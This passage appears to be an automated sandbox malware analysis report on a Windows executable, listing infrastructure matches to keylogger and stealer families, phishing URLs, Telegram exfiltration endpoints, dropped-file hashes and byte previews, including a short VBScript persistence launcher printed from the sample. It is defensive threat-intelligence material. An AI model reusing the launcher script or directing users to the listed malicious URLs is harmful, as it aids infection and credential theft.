  rPO0977-6745.exe | malicious | Snake Keylogger
  • 158.101.44.242
  z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger
  • 158.101.44.242
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
  • 158.101.44.242
  rRFQ_025261-97382.exe | malicious | Snake Keylogger
  • 158.101.44.242
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger
  • 132.226.247.73
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  • 132.226.247.73
  SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger
  • 132.226.8.169
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger
  • 193.122.6.168
mail.vvtrade.vn
  NATV0980090004.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  • 118.69.190.131
  ER987654567909.bat.exe | malicious | Snake Keylogger, VIP Keylogger
  • 118.69.190.131
api.telegram.org
  Install.msi | malicious | Unknown
  • 149.154.167.220
  rPO0977-6745.exe | malicious | Snake Keylogger
  • 149.154.167.220
  z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer
  • 149.154.167.220
  Updated PI.exe | malicious | AgentTesla, RedLine
  • 149.154.167.220
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
  • 149.154.167.220
  231210-06-AgentTesla-9da180.exe | malicious | AgentTesla
  • 149.154.167.220
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger
  • 149.154.167.220
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger
                                      • 149.154.167.220
                                      Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                      • 149.154.167.220
                                      List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | f84038a5c35557bb57839423dcab27287ac5ab490fca503f496df61da5e2bc99.exe | malicious | Bdaejec, Vidar | 149.154.167.99
 | https://klaim-hadiah-dana.tt3.my.id/ | malicious | Unknown | 149.154.164.13
 | https://bagi-bagi-hadiahx-dxnafry.danaespay.my.id/?its.dana.co.id | malicious | Unknown | 149.154.164.13
 | https://konkurs-yuliya.blog/final | malicious | Unknown | 149.154.167.99
 | Install.msi | malicious | Unknown | 149.154.167.220
 | 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | malicious | Bdaejec, PrivateLoader | 149.154.167.99
 | 35fcdf3a.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
 | rPO0977-6745.exe | malicious | Snake Keylogger | 149.154.167.220
 | z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer | 149.154.167.220
 | Updated PI.exe | malicious | AgentTesla, RedLine | 149.154.167.220
CLOUDFLARENETUS | LisectAVT_2403002A_40.dll | malicious | Ramnit | 162.159.61.3
 | https://msms.live/index.php | malicious | Unknown | 104.21.36.31
 | LisectAVT_2403002A_392.exe | malicious | NovaSentinel | 104.21.68.143
 | http://nigoovip.com | malicious | Unknown | 104.18.20.154
 | LisectAVT_2403002A_260.exe | malicious | Python Stealer, Blank Grabber, Rose Stealer, Xmrig | 162.159.138.232
 | INV#0985.html | malicious | HTMLPhisher | 104.18.11.207
 | LisectAVT_2403002A_263.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.194.35
 | LisectAVT_2403002A_27.exe | malicious | Ramnit | 172.64.41.3
 | LisectAVT_2403002A_272.exe | malicious | Unknown | 162.159.61.3
 | LisectAVT_2403002A_204.exe | malicious | Python Stealer, BLX Stealer | 104.26.12.205
ORACLE-BMC-31898US | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
 | counter.exe | malicious | Bdaejec | 158.101.87.161
 | rPO0977-6745.exe | malicious | Snake Keylogger | 158.101.44.242
 | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
 | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
 | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242
 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | 158.101.44.242
 | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
FPT-AS-APTheCorporationforFinancingPromotingTechnolo | NATV0980090004.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 118.69.190.131
 | U6YcZ2TLtT.elf | malicious | Mirai, Gafgyt, Okiru | 42.119.93.45
 | ts2d2a5oFa.elf | malicious | Mirai, Gafgyt, Okiru | 118.68.212.161
 | 92.249.48.47-skid.x86-2024-07-20T09_04_17.elf | malicious | Mirai, Moobot | 58.186.132.83
 | 92.249.48.47-skid.m68k-2024-07-20T09_04_20.elf | malicious | Mirai, Moobot | 118.71.2.88
 | U8E1VlGTmr.elf | malicious | Mirai | 42.119.10.206
 | arm.elf | malicious | Mirai | 42.117.139.128
 | mips.elf | malicious | Mirai | 42.117.139.120
 | 93.123.85.50-mips-2024-07-17T09_21_42.elf | malicious | Mirai | 42.116.150.127
 | botx.arm.elf | malicious | Mirai | 103.121.90.104
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe | malicious | Lokibot | 188.114.97.3
 | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 188.114.97.3
 | rPO0977-6745.exe | malicious | Snake Keylogger | 188.114.97.3
 | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
 | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | 188.114.97.3
 | afRggioa9s.exe | malicious | Unknown | 188.114.97.3
 | afRggioa9s.exe | malicious | Unknown | 188.114.97.3
 | Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.97.3
 | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002A_113.exe | malicious | AgentTesla | 149.154.167.220
 | hostr.exe | malicious | Unknown | 149.154.167.220
 | FD79E637E91EC51483559DB807645755DBA0EF95199582FB48D4275445DBED5A.exe | malicious | Unknown | 149.154.167.220
 | EDE7E437E1F16D6499BB3EEB101D92AD78275F28B09245F9261BE646632D1857.exe | malicious | Unknown | 149.154.167.220
 | D80AEFA9CFC175E990BD57E18F5ACD9D8CB54D82EF5B606E3CFE62158058A67E.exe | malicious | Unknown | 149.154.167.220
 | http://pub-579166ebb48443aa8a269450193d8f25.r2.dev/auth_gen.html?folder=fvnps2fman | malicious | Unknown | 149.154.167.220
 | https://wordpress-1304782-4748926.cloudwaysapps.com/wp-admin/ES/login/index.php | malicious | Unknown | 149.154.167.220
 | http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.html | malicious | Greatness Phishing Kit, HTMLPhisher | 149.154.167.220
 | https://spotifyinfo.hosted.phplist.com/lists/lt.php?tid=cE5RAldVVgBRVk4GBlYLHwNRC1IeAVBSBUxVVAcHVwQBBlFcVwJLBgMAUwMCUQsfVgpcXR4NBwcPTFpVB1JOB1kGBwdXVA5VXgVWSAMEBgIPA1pSHglWUgdMV1YDUU5dCgYGSQcHDlBTBQADVVcCCwG | malicious | Unknown | 149.154.167.220
 | https://mail.tekdecoracoes.com.br/don/upload/en.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4 | malicious | Unknown | 149.154.167.220
                                      No context
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):193414
                                      Entropy (8bit):7.982390763949422
                                      Encrypted:false
                                      SSDEEP:3072:igbZChl/ellOaNsJaOdpbO2BFH0pYgIEvCN3BXzJedAOqetbj+YLEw0pJOvY:xp2eVOdpbO2PHoYBhBXzJo5qetZ70pJ/
                                      MD5:DDB6823CDC0953D1A0A2473455E656D7
                                      SHA1:9930C2C6A0E90BF27951EF1C184D455CE30D8EB8
                                      SHA-256:DB43503DDAB931E1FAAAB154C57E230625B9874DB8A6C242D700CEF0309BBD15
                                      SHA-512:5442B44236E58AF175CEA3EEC1DB11D086995785DFC1C3859B3E90CCA2114D9EB66E6E6437B9F0B8B8702ED722BA7E6F1CE80DC3D1C79E4DC2DFBB8F58067ECF
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....CyT.]^.U..(.}..W..j .Ej.......H...4..E.....|.....I..Y.Iz.N..I<.sg.N..i...3......}-..cqK..C,.[k......3.'..v..6.&.Uk.l&....Wn..e5..fSh...3...S+...2.0.Aq.N%^P..q+.....<.~.x.P||...d..."T:.v.C..t.8....{.R.U.U.]jM^....V|...D..?...V#T........T.P...kRz.V.P...7ZU^.U..(.zU:.G.Zj.z.x...p....t..L.)..)....S....5z.....P@%..Ny.t.eX...N.....Q_.V.(1.U.T......,]'...iQ.|.@.........*H.G...E.L.D.(a..........JP.G..O'rY.....<.p.....[..>H...........vz..G.v.9......Q...E6.C..g.h>..H....../7..a3x...S.......Rs]..v.z.b.T.u.Zo..y..(..7g...omH....#.JG.W...pul..qW.s.5.]b...j#T........7--:..T.5.>.K..V>.J.o..-...W.-.G...y..x..Z...T..5.J?^GI.V.z.v.....{........@....y..T.F..j?K...E P....a...\-.c....>....W7.....H..-..U....=E3......u...c..N...P..+1.6v.... 1.VNu.......%...i...3...@:[y..cL...<k.j.H.M..{}~ES...u..V.T....`G[.U.o.S+e.. ..w;....h.*G.Q(......Z.W....z.b!c..xR..B...C;8.&V........@|...".b..5.9....l.tz.jo@.p..+.g.....^~m.. ..........@2..s...C...=v.T...8.^C...T*...
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9760
                                      Entropy (8bit):7.639171384559618
                                      Encrypted:false
                                      SSDEEP:192:ZAiDhJsp1HfWpDuKYdB1Qub5+k1FFdUa3tT1UQS2ZRvUWc30M:ZAi7sp5fW1Ihb5+kDY+t5PYkM
                                      MD5:948CA370E392DF65702ED9C1D85B601A
                                      SHA1:92DAE2F181AD0F53C7C16C0D2F60C2F21B5397D2
                                      SHA-256:185343A15FCD7136683C71E9633DFF552D110601BAA86065160A6E47B5384DC1
                                      SHA-512:C24D27116A850DC1F75574263E4FFCC436D01A513C5454E5328745AF7F3835C4FBF96E33807C554BB872EC86C895DFF04F37DAA71BD34E391B5E16F52703C10A
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):193414
                                      Entropy (8bit):7.982390763949422
                                      Encrypted:false
                                      SSDEEP:3072:igbZChl/ellOaNsJaOdpbO2BFH0pYgIEvCN3BXzJedAOqetbj+YLEw0pJOvY:xp2eVOdpbO2PHoYBhBXzJo5qetZ70pJ/
                                      MD5:DDB6823CDC0953D1A0A2473455E656D7
                                      SHA1:9930C2C6A0E90BF27951EF1C184D455CE30D8EB8
                                      SHA-256:DB43503DDAB931E1FAAAB154C57E230625B9874DB8A6C242D700CEF0309BBD15
                                      SHA-512:5442B44236E58AF175CEA3EEC1DB11D086995785DFC1C3859B3E90CCA2114D9EB66E6E6437B9F0B8B8702ED722BA7E6F1CE80DC3D1C79E4DC2DFBB8F58067ECF
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....CyT.]^.U..(.}..W..j .Ej.......H...4..E.....|.....I..Y.Iz.N..I<.sg.N..i...3......}-..cqK..C,.[k......3.'..v..6.&.Uk.l&....Wn..e5..fSh...3...S+...2.0.Aq.N%^P..q+.....<.~.x.P||...d..."T:.v.C..t.8....{.R.U.U.]jM^....V|...D..?...V#T........T.P...kRz.V.P...7ZU^.U..(.zU:.G.Zj.z.x...p....t..L.)..)....S....5z.....P@%..Ny.t.eX...N.....Q_.V.(1.U.T......,]'...iQ.|.@.........*H.G...E.L.D.(a..........JP.G..O'rY.....<.p.....[..>H...........vz..G.v.9......Q...E6.C..g.h>..H....../7..a3x...S.......Rs]..v.z.b.T.u.Zo..y..(..7g...omH....#.JG.W...pul..qW.s.5.]b...j#T........7--:..T.5.>.K..V>.J.o..-...W.-.G...y..x..Z...T..5.J?^GI.V.z.v.....{........@....y..T.F..j?K...E P....a...\-.c....>....W7.....H..-..U....=E3......u...c..N...P..+1.6v.... 1.VNu.......%...i...3...@:[y..cL...<k.j.H.M..{}~ES...u..V.T....`G[.U.o.S+e.. ..w;....h.*G.Q(......Z.W....z.b!c..xR..B...C;8.&V........@|...".b..5.9....l.tz.jo@.p..+.g.....^~m.. ..........@2..s...C...=v.T...8.^C...T*...
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9760
                                      Entropy (8bit):7.639171384559618
                                      Encrypted:false
                                      SSDEEP:192:ZAiDhJsp1HfWpDuKYdB1Qub5+k1FFdUa3tT1UQS2ZRvUWc30M:ZAi7sp5fW1Ihb5+kDY+t5PYkM
                                      MD5:948CA370E392DF65702ED9C1D85B601A
                                      SHA1:92DAE2F181AD0F53C7C16C0D2F60C2F21B5397D2
                                      SHA-256:185343A15FCD7136683C71E9633DFF552D110601BAA86065160A6E47B5384DC1
                                      SHA-512:C24D27116A850DC1F75574263E4FFCC436D01A513C5454E5328745AF7F3835C4FBF96E33807C554BB872EC86C895DFF04F37DAA71BD34E391B5E16F52703C10A
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):193414
                                      Entropy (8bit):7.982390763949422
                                      Encrypted:false
                                      SSDEEP:3072:igbZChl/ellOaNsJaOdpbO2BFH0pYgIEvCN3BXzJedAOqetbj+YLEw0pJOvY:xp2eVOdpbO2PHoYBhBXzJo5qetZ70pJ/
                                      MD5:DDB6823CDC0953D1A0A2473455E656D7
                                      SHA1:9930C2C6A0E90BF27951EF1C184D455CE30D8EB8
                                      SHA-256:DB43503DDAB931E1FAAAB154C57E230625B9874DB8A6C242D700CEF0309BBD15
                                      SHA-512:5442B44236E58AF175CEA3EEC1DB11D086995785DFC1C3859B3E90CCA2114D9EB66E6E6437B9F0B8B8702ED722BA7E6F1CE80DC3D1C79E4DC2DFBB8F58067ECF
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06.....CyT.]^.U..(.}..W..j .Ej.......H...4..E.....|.....I..Y.Iz.N..I<.sg.N..i...3......}-..cqK..C,.[k......3.'..v..6.&.Uk.l&....Wn..e5..fSh...3...S+...2.0.Aq.N%^P..q+.....<.~.x.P||...d..."T:.v.C..t.8....{.R.U.U.]jM^....V|...D..?...V#T........T.P...kRz.V.P...7ZU^.U..(.zU:.G.Zj.z.x...p....t..L.)..)....S....5z.....P@%..Ny.t.eX...N.....Q_.V.(1.U.T......,]'...iQ.|.@.........*H.G...E.L.D.(a..........JP.G..O'rY.....<.p.....[..>H...........vz..G.v.9......Q...E6.C..g.h>..H....../7..a3x...S.......Rs]..v.z.b.T.u.Zo..y..(..7g...omH....#.JG.W...pul..qW.s.5.]b...j#T........7--:..T.5.>.K..V>.J.o..-...W.-.G...y..x..Z...T..5.J?^GI.V.z.v.....{........@....y..T.F..j?K...E P....a...\-.c....>....W7.....H..-..U....=E3......u...c..N...P..+1.6v.... 1.VNu.......%...i...3...@:[y..cL...<k.j.H.M..{}~ES...u..V.T....`G[.U.o.S+e.. ..w;....h.*G.Q(......Z.W....z.b!c..xR..B...C;8.&V........@|...".b..5.9....l.tz.jo@.p..+.g.....^~m.. ..........@2..s...C...=v.T...8.^C...T*...
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9760
                                      Entropy (8bit):7.639171384559618
                                      Encrypted:false
                                      SSDEEP:192:ZAiDhJsp1HfWpDuKYdB1Qub5+k1FFdUa3tT1UQS2ZRvUWc30M:ZAi7sp5fW1Ihb5+kDY+t5PYkM
                                      MD5:948CA370E392DF65702ED9C1D85B601A
                                      SHA1:92DAE2F181AD0F53C7C16C0D2F60C2F21B5397D2
                                      SHA-256:185343A15FCD7136683C71E9633DFF552D110601BAA86065160A6E47B5384DC1
                                      SHA-512:C24D27116A850DC1F75574263E4FFCC436D01A513C5454E5328745AF7F3835C4FBF96E33807C554BB872EC86C895DFF04F37DAA71BD34E391B5E16F52703C10A
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:ASCII text, with very long lines (28674), with no line terminators
                                      Category:dropped
                                      Size (bytes):28674
                                      Entropy (8bit):3.585604397974273
                                      Encrypted:false
                                      SSDEEP:768:JxObwScFCo3T3iC2v53n2ntQUA+n++nmkE/ksf2HzOmL5sCWC:GbwScFCo3T3ifv53n2ntQUA+n++nmkEW
                                      MD5:8CB4BCD1782B001E47850EAD93D457A9
                                      SHA1:1AEAC30FFA29B71FC863096CC7D2919F6E139E06
                                      SHA-256:D7D1525BF5F73FD6A173AFE87005008B1FF43734A492C0CCAA302D411A6D149A
                                      SHA-512:987586188FE1A2298F5C8455840E42DC4AB0C27A161BB9ED0C38AADB0E6D67BB97571B5F7437F9DDA2913E8BF1B9C39FE82C2979BF081E58762BF8A3AA59D75A
                                      Malicious:false
                                      Reputation:low
                                      Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):208384
                                      Entropy (8bit):7.779443462953202
                                      Encrypted:false
                                      SSDEEP:3072:e56cj7Se/x+hSJO+ulCrr2xhMGX+me2wgcP12gEsrzl4OoIyPb2kV/MkFRR7wG:evGzhR42Xcg3+6gyPbbJRR7B
                                      MD5:0F8BFEB615B60267E53709E260C3C291
                                      SHA1:8FCBE7323A46392EE07E6CA50EB854654F0CC485
                                      SHA-256:4A66B3362A7DDD57892E7F8D3AA9E1C46C868F348F54F4E5894691F34F7D36E1
                                      SHA-512:0B6A818C36CD2F496988851629C610BC67F3150D576DF3B4A9E1C37C7CFAF14FBDE0CFFD26294E3AA263E6E7AF5868C1DD9385F941F9D4A8ECC1655B1F7D2232
                                      Malicious:false
                                      Reputation:low
                                      Preview:...NKWCUUTGW..HW.UQTGWZN.WCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQT.WZNFH.[Q.N.{.I..t.<.$z>:8$'09g4; &87u31g%/ h>-u...w7!,2mX\^cWZNHWCU9D.zv?.)o$.*k&.0zt<+n%.)Q..)h$.*k&.0.&.+cw))F?.)qv8*.&.0zt8+|%.).'+?o$.*GWZNHWCUQTGWZNHW...2GWZN..CU.UCW..H.CUQTGWZN.W`TZUNWZ.IWC.PTGWZNg.CUQDGWZ.IWCU.TGGZNHUCUTTGWZNHWFUQTGWZNH'@UQPGW.uJWAUQ.GWJNHGCUQTWWZ^HWCUQTWWZNHWCUQTGW.[JW.UQTG7XN.ZBUQTGWZNHWCUQTGWZNHWCUQTGW..IW_UQTGWZNHWCUQTGWZNHWCUQTGWZN.ZAU.TGWZNHWCUQTG.[N.VCUQTGWZNHWCUQTGWZNHWCUQTGWt:-/7UQT_.[NHGCUQ.FWZJHWCUQTGWZNHWCUqTG7t<,674QT.:ZNH.BUQ:GWZ.IWCUQTGWZNHWCU.TG.t*)#"UQT.gZNHwAUQBGWZDJWCUQTGWZNHWCU.TG.t<;% UQT.Z[NH7AUQZFWZnJWCUQTGWZNHWCU.TG.ZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQT
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1113600
                                      Entropy (8bit):7.005180587657202
                                      Encrypted:false
                                      SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aBqNN6hVF:STvC/MTQYxsWR7aBqN6
                                      MD5:F202040EB9D89916F413E67D59C7FD7F
                                      SHA1:84CE5B7CA29EB6E4A5290D21C4948D505C23A04A
                                      SHA-256:59337107A058BFD8EB4B8BC0506208D1EAB639B6FBD92AEFB156E7B21A1D3695
                                      SHA-512:683C959289660691FFFB1403137EC48D390A6CA140F1C76445A8CA90CE5D9A2C840AC1E3B167F1D99255382FEC5F02B724D87352E1E64F5D0D9D5E312612A65E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 38%
                                      Reputation:low
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........N......w.............@..........................`......#.....@...@.......@.....................d...|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):286
                                      Entropy (8bit):3.4256818806659766
                                      Encrypted:false
                                      SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1BKvf6nriIM8lfQVn:DsO+vNlzQ1Bof4mA2n
                                      MD5:19D6A57BD890E4472C6DEAEAA9453F74
                                      SHA1:898A614D7948AD8F03117560262EF2CD2BC44E08
                                      SHA-256:A68C9D9683F2870F00FE359B2B1DB793EA688B2F4EB584EDC7C88044F2B29989
                                      SHA-512:652748CA5150AFFDC8EA8267AEA033CC5A496D71AAC9963266F17696653CC46C1F50B00AF67908C87D4D19B1783DE6BDB9502C7F8C13040521B68FC89933BDEC
                                      Malicious:true
                                      Reputation:low
                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.n.o.n.s.u.b.m.e.r.g.e.d.\.c.h.o.r.d.a.t.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.005180587657202
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:DSD876543456780000.exe
                                      File size:1'113'600 bytes
                                      MD5:f202040eb9d89916f413e67d59c7fd7f
                                      SHA1:84ce5b7ca29eb6e4a5290d21c4948d505c23a04a
                                      SHA256:59337107a058bfd8eb4b8bc0506208d1eab639b6fbd92aefb156e7b21a1d3695
                                      SHA512:683c959289660691fffb1403137ec48d390a6ca140f1c76445a8ca90ce5d9a2c840ac1e3b167f1d99255382fec5f02b724d87352e1e64f5d0d9d5e312612a65e
                                      SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aBqNN6hVF:STvC/MTQYxsWR7aBqN6
